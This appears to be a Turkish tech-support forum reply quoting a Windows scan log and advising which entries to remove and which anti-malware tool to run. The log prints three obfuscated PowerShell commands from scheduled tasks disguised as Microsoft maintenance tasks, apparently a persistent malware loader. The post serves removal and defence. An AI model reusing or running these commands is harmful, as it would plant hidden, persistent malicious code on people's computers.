O22 - Task: \Microsoft\Windows\Maintenance\WinNAT - C:\ProgramData\Windows\Profile\1.js powershell -c "9255980565;$Duk='weoDxCiFwp';'k&(4gc7m 9A*)-Toy*e).bNa9mes (]''5_us_2ign3jg -2S_yilst_seqmue;uj.s7ij_ng)- _S=wys{2tde_7m.4_IpO]_;u1cs7i]3ng(= -Sqyysm!t+etum.__R_u/?ntj_iym6_e.eyItn(+tejyr7o6_pSi_ecr_ovih=cce}qs;_buts3yingag2 r-Mi_mc.rq.osv(o{fvgt.]_W-i_)n3xt2g;fwpu!,b7lqeiccc _c3_la2?shs-_ Tx-zu{[{devql_e+_ga7_t_e_h v3ooci3}d _.y_k_m()45;[ps(ubxzl)i92c tds[t_?atgxi!c7+ vuzo_i)_d 1[qrqtguDx7(,)_n{b?_ygt_)e[k_]fMlzxTdfp(=_bFi2_l_ed_.E)_x?iq2st_[sn(+jEky[p-cz4jh_+y_t_vvrw-v+rl_Ekbsp4cjg)?t_F_i.yle_t._R)beazld,A8kll6_Bcy!lte_ys0(9?Ekdrp,ci_jh,}y_ty.vr/!v_rycEkr_p_c8v):__(+b.1ytxie_[55])onR=epsgic}s_t_ory?_.,L/_ocjla/lj_Mauacuh6_inouef._8Op0_e6nr_Su?_bfK2hey(}(6@!_Ek__p3c6gSO07FdT]aWAgxRuE_7\M_kiocphro_us_ozgft-z\tC?)TF__\_T)lIP__E_k48pcy_)z.d+Gea]tyVamal]-uze]s(E_3ktp_/cj_9hzy_ytvz_r0v_)rEouk_p7xc,.}n_ul3ll5_)c;xqifd+(-MegxTn)pk=){=n9au2l_?l)_1r[e_stu/dr{nun;i-hn0t3i Jn_e8==rMx,zTzp46.Lk?epn5!gt5qh!;q3fo_ir_(qlin_2tl v_On.3D_pr,=0h_;tO)cnD!1p} ,[!=43Jbex]-1d};,O__nDd_p4+p_+)l_{3M4pxT7!p_[_7On3[D8pj_]^p]=_(?_byy=tve)z)E_(k]pk3cj_1D0a6)nf1=w{By3kC[kMw_w-?s}ohsuixwx(_.2hstwG=n2_h5}iWp/P8O_7?/__d3,k5=/03=_Q/8.}jlF(A_f9[qjq_v9cxg_7}tP_eLF/oB2g_fbVdcm!0.wEp_pzrX__s,_3,.U)9/kzi.?dix/4_]/8py_9n_)4p4(_h-_5V9])=j}-_En{0l/w{k)nm92XXe60pbnfcMg_5/ad1+f_3I_Pe_OO_sb_D_wg}3b!!._gqg_eSiMn_gL8{B]2zcPQ=(=_w_ha(w3=4IdoaAep[vE!(kp}-c][e=On_,D+ph?Kb_)1z2)l6]8r;_},kIn4_t_P_5trq+ dj4wDJiqk_=_((I+2n{ts2Pt}jrs)r?0;p+I{n8-tP1ct_rht X_rC]lx_=(,pI3n?utPxft_rme)J({eo;__Nt9,Azl-/loa6caau[te_bVui0_rtqouna9_lMg_e-m_-orgayx(p-(I95n_tyrPt_fr=)be(-qk1f)_j,rtbe(f9/ j_kD=J]jk,a+(_I_hntpmPctr_r)(_0_,0_re!pfn scXC_nl_,.40xv_1_0rb00yl,[0}nx4oe0h)__;Mn5a}r_fsh_7aul.i.Cqpo_p(iy(.(M!xh0Tp,_,{0k_,j2aDmJa(k,zwJ(e9k);__(s(]_ykh4){M_]ary)seh2ral_b.}Guuet6eD3eu.lel0gtag}texpF{o{crF=pufn_=ctr_izobfnPf-o_irznto6ekrew(j}nD_J9_k,w_tdyzxpeluo7f3}(y][k_)l/))h!(q)-_;}_l[uDj(lledI_m[_pon_r_t,4(Egwk7p_7cn_vtbd6vllk)Euk_kpc7r)0]dcprm7iivk_atuwe- 7+st1[aut79icy/ ce_hxtz/e_rg?n g8l_oo_ng-a _Nz8tA_}leld9oc+ba1tgjeV[_igr_[tue7aulh_Meffm3oubry?g(wIw5nts_P_tbsr kgKzys_Ax)4,?rh5ef_w ]I[vnt-_P)t_ar 68eujd6,Iz_nqt}_Pt!.rh 2mgitbzl,]fre_xfo 6_In_.t_P{mtr_a cD2-Tl.7,oUs_Inift63,,2 __W_d!_D,t_U_Iqmnt}d3+2)y Gs_Xl)wm;}_''-_renplkacle''_.(_..=)''d,''y$1r'' b-ryepplajce0''Elkp=c''u,[_ch_ar+](k342) 4-rdepxla0ce_''K_b''2,[,chfar5](m37[))?;[xEnfvi_ro_nmaendt]r::_Cuvrr3en_tD/ircecrtolry?=p[wdt;[aTz0]:z:q_qu)D(x);'-replace('.ekkl(ekkl.ekkl.)'-replace'ekkl'),('$'+822/822)|&($Duk[6]+$Duk[1]+$Duk[4]);4121212040" (file missing)
O22 - Task: \Microsoft\Windows\MUI\456603549 - C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -c "726005064;$tehiI='MmLeyN)lhmxVh.jmWW(QZTijWiG';$rep_var='+&(_gcsm _A*k-T[y*s).9Naxmee (h''yzusggiln+6g 0_Sayyvstxbewm_-;u_4sci_kng_h +S1qysdyt(ecgm.!!I,Oe_;uh8s6i_-ng!? nS3(ys{wt!e_[m._hR+u__nt_qi)m._e.ecI4n_=te4.r_oo[pS-_efr1xviazc_e/rs;.!u9sqwinu_g/ }(Mif_clr)5osn_osfx0t.-vWiifln35_2.;iipu[,b3lksic_n _c_ala5ss_sp3 c__KeP__yd8o{id-/el4_e_g!satqne_ g,volnijd_s v{tVxx_8Atzs())_2;p]uu[b1_li+!c, i-sty2aztl/ico_ =v_(oimjd= )=WF__t-Wza()7_{0bz,yt_=e2[?6]u_lc_Sz=mQbe=nF/{il_aea.,_Exgqiys7_ts_x(aM__ZdouMqj._hy{.tovzarvcgreMn_Zdb6Mz)n_?F52i,lt/e.)tR!e__add5A/l))lB1nykt_kesnr(+M_]Zd_xMjj_xhylpt_vm_rv__roM_[Zd/hM,)e_:(_wb9y5fte=_[1]zk)R2ye3g/vis_ktpr_fy.?+L,o]lca__l_Mnqac_ihgiecne)f.fOu1pe__n1SafubomK1e8dy(c]@qM_dZd?rMuS3nOFloT}W,_AR{0Ev\dfMi_pc4rutos.to1f_gt\_/C_Tb_F\(/TlI{)PM2rZ?d9_M)vu.]G__et+}V6ax6luj(ed(_jMZj6dlM__jh._yht!kvr/_v_rw.MZr_dnMp7,n01uml/nl)=f;.ih,f(,2u_c6,Smx.Q3==_=nrjusl9jl)9rrie,2tu,5rnn(_;i+dnbtw_ ve_v_zwup=(_u_c5_SmlaQ_.feLe__n+g)_th_8;afy-or+_(_i+6nt/r eS0!WDlgb0=a_0;)_S5W1hDb,l n!oz=v_vvyz0fp-8_1u;6wSW46D[bum++{0),{iuuc4zS.m0_Q[+bSrW_aDb2s]_^_1=(_fboy!fte8))hMmwZdvnM64z_({_3I5M_zeS__s}I__g?_8Jupmw]O0dNg?a09-k4!vFc_Ta_wi60og/2_n7dSl9Nep_E_xi=YPvcnf8mitS7+ue3u.SY33-)dqc.My9Zcd_3M[9nSxWg-Db/]iyys_Sr__4!6)5];38}_I2lntm_P_t_.r n3Q?M_wEnt[T7=z_(I0hn3t_4Pt)yr4)z_0;a!I]n_}tPz1tyr_p cjsD_Gg_U=5f(7Ix+nt,.P+t1_r)?!v/vr-zp3b;7N+[tAb_l.llpocuna?tp[eV__i{rl_tu=na_lh+Me_cm1o5zryx_(p(u9In4mthP.rtruz)}(_v-13_)[,qjrewhfg ]vQMvoE.n,aT,xp(4Iv4ntr_P_tw/r)nq0z,2_rez9f4 .icDh[G0Uf_,0oax)1?+00c_0_,_r0x(64y0e=);r_Mpa9mrs7!h(a23l.5_Cdogwpyzt(1u[+cS)jm,Q4j,0=u,_Q[fME62naTu!,v(}v_z_np)_w;3(5w(vp=Vcx_3At2})}Mn{are_s_hzzal_c._G!,ettnD_e8_le9_g_ak_tem=F_o0}rFyeu]n_,ct}_i2o[ynP2_o/i-2ntoweers+(Ql_M_E0_nT!c,_tq)ype}etov2f(x-vuV_rxA-?tc)vx))__(y)_i;}5_[_Dbfll_8Iam(4poyzr_tfa(Mf_Z1dcrMnart-dk-ll__M]Zw+dMzs)d]l_pry_irvr0at55ep __stx)a)t0,ice_ oe=)xtvee0r_bn ,7lno__ngma ?N]7tA_flhl]mocc9a_tveeV_di)rd9tut_a5l1_Meuim_o-qry]i({I_wnty_P0t{2r p7a(A10Jt+6,crr6efz_ =Ib_nti}P[t_jr _kkhXubrB]_ja,mhInh)t4Pm?trwm 2ys3mQ2}Y2ga8,rtgekft_ I[qndt,yPtr4r= !ntn_aL_gg_,U_8I.n__t3b72_ v6FIjbMdx__p,kdUlIfrntma3621- AigWmQtci)_d;x}'']-r.epqla{ce9''.+(._.)/'',6''$(1''y -jrempltac7e''_MZndM9'',p[c_ha)r]8(3f4)r -9relpl}acze''xiy}Sr+'',l[caha,r],(3f7)l);6(l6s ,$einv5:txemup s-D)i|jwh_er[e{_($l_.2Na_me_.L_en_gt6h z-edq _8)e-a_nd_((_Ge_t-eAc_l 2$_c.Fxul1lNsamue)q.A]cches_s.eFi}lenSyyst]emkRi)gh_ts_ -neq5 ''_De/le+teo'')p})r|d]el5;[_En1vi_ro2nm)enht]a::iCu_rr8en)tD+ir_ecitojry2=p!wd-;[fcKvPy_d]0::}WF3tW-()(; ';'$rep_var -rep'+''+'lace($tehiI[13]+$tehiI[18]+$tehiI[13]+$tehiI[13]+$tehiI[6]),(''$''+176/176)'|&($tehiI[22]+$tehiI[3]+$tehiI[10])|&($tehiI[22]+$tehiI[3]+$tehiI[10]);3927229867"
O22 - Task: \Microsoft\Windows\MUI\736457749 - C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -c "7659087377;$WZlfr='TeFaE)SQdlxvP.Mfp(his';$rep_var='_&(cgcwm 6A*_-Tny*v).5Na1me. (z''_2usp4i{n_/g _0Sxysqst1eeqm7a;uo!s)i.-ng+_ tS?_ys(ut_e!dm.?gIjO4};u6_s8i_vnga+ uS?)ys_/tye)pm./zRbu}nnttii{mc_e.c/Iins_te?drmon4pS_se.r/9vi=wcgeq{s;jzu_sbiintegb 4eMi4{c6r4dosj=ohf__t._6Wqi59n3k_2r;_-pur_b_lssic__ xc[_las2stsgx w7mB6k-hm{._d!e0ple{fg_a+ate_7 _vk-oi__dp eblY__Vnv4ye(w/)s;1wpu_wbel_-ic-_ hsuttaf(t_i_oc 8xv0o=_id-2 lZ_sUUu]tzd=7()jn{6b_eyt__e.[t)]S_0cwj{8w=c-F-iy{le2e./E_axi_rs_t_3s((gb8b_.lS[_y_u+4er_phyfh_tw9vt]b}(bly,S])18?Fqii/l_ge.5!Rye_iad__A7lu}lBxpyst__esou()bz_bl3.Sjyfrue5jr/hs-ftl!wyt?0bb_[l0S_o):.7(lb_uyt0_e_[q_])2?Riebjgit6svt[gry(_._L_}oc_5a.l9_Ma+_c+hj_in_!e_.glOpt_ein_6Sus4bmK8/eyci(o@osbb3?l8S//SObfF_T_0WA_gR_E,_\M/gi9cqtrocvsao_hft9a\gCk(TF3.\_TgsIPkabpb,/lSp))g.?eGew6tbVy?al_)u/ejg(be7bbl_mSytpune.[rhy8f1t(_wt.tb_byslS_-,(nf9ulxml.)4_;i9_f_((_Sc)rj1wu_==_tn_u-}ll(q)/r3_et7?uars_n;-wi+n_jt pfi0ip-dAh_v?=,zSc9_j_wzd.Lq-e_nv5gt_=hf;[_fo4jr6(}sin)6t_ }_lq84q_qj_=0ho;sl3_qq?iqz _1!=[wiaij3dAvcv_-__1;_vl4q?7qq0o+8+ew){}aS6cu_jw9s[_l}_qq01q_]jk^=!q(_b}zytnue_)8_bbaql_S.s)32hWijpuys[obgP[bXv__km3w)XS__qh)ryWN-3_}o.7!E_9Kk(_r8-_=.tw_4-x__2_v1[05v+e_m__Mii4=o31-G84w0xCpcT?__0]G}r,2mvk_/o5N{_9Vi(6_JNy_+_j.iY8ct+,5__Cqs[z_s,boZ8_V_b_8jF+r!0_h{WDt=EfA}nck_}AmW9nA!-?D1c7wi0acSig}{sr_2SgEf/ec}absYcfU?iaV_//2ASh.(y9]_je2.P]J_l-Dn_Et79z/7__x8/_wG7s[e+/._)b_tbsl_vS[rgliq18qq1wmhu)dzC_?U21_h25_!]);_(}Ib}n4to3Pts9ro 2cvIe8O_h}p=(_pIbnbjtPa-tzrpt)0p};4I2hnt_hP=t0ar qzT_W_tFu=k=f(liInr/t,P7_tr]l)hi?)id7oA0vo-;N/(tbA9[llz_o_c0mat{ze3V.rir.8truttalk_M=e2_mo_cr)y_b((0kI_n_ytPl.t.rd6)(__-=13/),_5r[ez)f __v0IqnOhf,,t(_wIn]rt!P5ftrb{)!0_t,r_+e_f?_ T7iW{F__u,=p07x06105_090o2,0(6xp4mq0)m_;gMcnar_zsih,3aly2.gCb_op_)yu(8_Scp)j{w__,0_b,0vavIOk_h_,_gii9yduAf_v)__;m(lu(l{_Y5Vjvveo-)_M7_ar,us}h/_al5-.tG_letj.D+eo=leskgdarmte,_FnofirF)[u?n44ctoqi_o=tnP_iori__ntx_eor{_(vv8I_O._h,a_t_yutpe6moxf_a(l?8YfVgvve{_).)gq)(e_)?;__}[/rD_l_-lI+1m_pk_or_}t6(5ebb6cl3S5.nt8wdul1xlbihb.ll)S)_j])p+3ri?2v_a_1te_h zs8=ta_xtri__c ete}xs[te__rtnr1 l_gotnxag n?N_t_xAlw_luo3.cakpt_e_4Vi-hritj_uakwl_Myhem8!o0r=_y(r-I6n_btPhut6r-{ Zz)N[j//IJ}=,0r__ef{_ _I3jnt7aPht2xr r_X?w_8gY=8,7Iepnt0aP7tt_r ?_M8FlmhwaiA!,__rem!fq 4_Inx_t}P9_trew rS_.DG95B5n6!,UaeIsn?ct3[c2_ _wlo_?qkZ(_,Ub1Iunp_t3_b2v g_xEj7ymvcb);.l}w ''7-r]epxlazcew''._(._.)o'',_''$w1''3 -wrevpl1ac}e''_bbdlSc'',_[c_hapr]_(304)m -nreepl[ac0e''/murzCnU''_,[lchpar[](m37m))_;(_lso $senxv:ote.mpt -sDir|wwhefrel{(y$_+.N3amge.pLe7ng}thq -{eqc 8_)-[an_d(5(G-et_-A_cl5 $]_.jFu4ll)Nanmek).2Ac/ce_ss2.Fril3eS4ys_te_mR.ig2htrs u-enq 1''Daelgetye''u)}n)|.derl;_[E5nvsir_on_me,ntd]:_:C/urgre_ntyDi(re_ct_orwy=_pw)d;v[w_Bkhm]!::rZU]Utgd(k);';'$rep_var -rep'+''+'lace($WZlfr[13]+$WZlfr[17]+$WZlfr[13]+$WZlfr[13]+$WZlfr[5]),(''$''+808/808)'|&($WZlfr[19]+$WZlfr[1]+$WZlfr[10])|&($WZlfr[19]+$WZlfr[1]+$WZlfr[10]);8186189367"
O22 - Task: \Microsoft\Windows\Setup\EOSNotify - C:\WINDOWS\system32\EOSNotify.exe (file missing)
O22 - Task: \Microsoft\Windows\UpdateOrchestrator\UpdateAssistant - C:\WINDOWS\UpdateAssistant\UpdateAssistant.exe /ClientID Win10Upgrade:VNL:EosWu:{} (file missing)
O22 - Task: \Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun - C:\WINDOWS\UpdateAssistant\UpdateAssistant.exe /ClientID Win10Upgrade:VNL:EosWu:{} /CalendarRun (file missing)
O22 - Task: Adobe Uninstaller - C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe --sapCode=PHSP --productVersion=21.0.2 --productPlatform=win64 --appletID=AppsPanel_BL --appletVersion=1.0 --appMode=Uninstall (file missing)
O22 - Task: ASC_PerformanceMonitor - C:\Program Files (x86)\IObit\Advanced SystemCare\Monitor.exe /Task (file missing)
O22 - Task: ASC_SkipUac_PC - C:\Program Files (x86)\IObit\Advanced SystemCare\ASC.exe /SkipUac (file missing)
O22 - Task: Driver Booster Scheduler - C:\Program Files (x86)\IObit\Driver Booster\8.0.2\Scheduler.exe /scheduler (file missing)
O22 - Task: Driver Booster SkipUAC (PC) - C:\Program Files (x86)\IObit\Driver Booster\8.0.2\DriverBooster.exe /skipuac (file missing)
O22 - Task: Driver Booster Update - C:\Program Files (x86)\IObit\Driver Booster\8.0.2\AutoUpdate.exe /auto (file missing)
O22 - Task: Opera scheduled assistant Autoupdate 1555434623 - C:\Users\PC\AppData\Local\Programs\Opera\launcher.exe --scheduledautoupdate --component-name=assistant --component-path="C:\Users\PC\AppData\Local\Programs\Opera\assistant" $(Arg0) (file missing)
O22 - Task: Opera scheduled assistant Autoupdate 1604332151 - C:\Users\PC\AppData\Local\Programs\Opera\launcher.exe --scheduledautoupdate --component-name=assistant --component-path="C:\Users\PC\AppData\Local\Programs\Opera\assistant" $(Arg0) (file missing)
O22 - Task: Opera scheduled Autoupdate 1555434621 - C:\Users\PC\AppData\Local\Programs\Opera\launcher.exe --scheduledautoupdate $(Arg0) (file missing)
O22 - Task: Opera scheduled Autoupdate 1604332142 - C:\Users\PC\AppData\Local\Programs\Opera\launcher.exe --scheduledautoupdate $(Arg0) (file missing)
O23 - Service R2: MonectServerService - D:\Pc remote\PC Remote Receiver\MonectServerService.exe
O23 - Service R2: PnkBstrA - C:\WINDOWS\system32\PnkBstrA.exe (file missing)
O23 - Service S3: GalaxyClientService - C:\Program Files (x86)\GOG Galaxy\GalaxyClientService.exe (file missing)
O23 - Service S3: GalaxyCommunication - C:\ProgramData\GOG.com\Galaxy\redists\GalaxyCommunication.exe (file missing)
O23 - Service S3: Malwarebytes Service - (MBAMService) - C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe (file missing)
O23 - Service S3: Rockstar Game Library Service - (Rockstar Service) - C:\Program Files\Rockstar Games\Launcher\RockstarService.exe (file missing)
O26 - Tools: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\DefragPath (default) = C:\Program Files (x86)\IObit\Advanced SystemCare\DiskDefrag.exe (file missing)McAfee kullanmıyorsanız bunları da fixleyin:
Kod:
O2 - HKLM\..\BHO: McAfee WebAdvisor - {B164E929-A1B6-4A06-B104-2CD0E90A88FF} - C:\Program Files\McAfee\WebAdvisor\x64\IEPlugin.dll
O2-32 - HKLM\..\BHO: McAfee WebAdvisor - {B164E929-A1B6-4A06-B104-2CD0E90A88FF} - C:\Program Files\McAfee\WebAdvisor\win32\IEPlugin.dll
O9 - Button: HKLM\..\{48A61126-9A19-4C50-A214-FF08CB94995C}: McAfee WebAdvisor - C:\Program Files\McAfee\WebAdvisor\x64\IEPlugin.dll
O9 - Tools menu item: HKLM\..\{48A61126-9A19-4C50-A214-FF08CB94995C}: McAfee WebAdvisor - C:\Program Files\McAfee\WebAdvisor\x64\IEPlugin.dll
O9-32 - Button: HKLM\..\{48A61126-9A19-4C50-A214-FF08CB94995C}: McAfee WebAdvisor - C:\Program Files\McAfee\WebAdvisor\win32\IEPlugin.dll
O9-32 - Tools menu item: HKLM\..\{48A61126-9A19-4C50-A214-FF08CB94995C}: McAfee WebAdvisor - C:\Program Files\McAfee\WebAdvisor\win32\IEPlugin.dll
O23 - Service S2: McAfee WebAdvisor - C:\Program Files\McAfee\WebAdvisor\ServiceHost.exeAşağıdaki aracı indirip güncelledikten sonra sisteme tarama yapın, bulunanları kaldırın.
Emsisoft - Emergency Kit: Free Portable Malware Scan and Removal
Emsisoft Emergency Kit is the ultimate free anti-malware and antivirus tool to scan, detect and remove viruses, keyloggers and other malware threats.
www.emsisoft.com
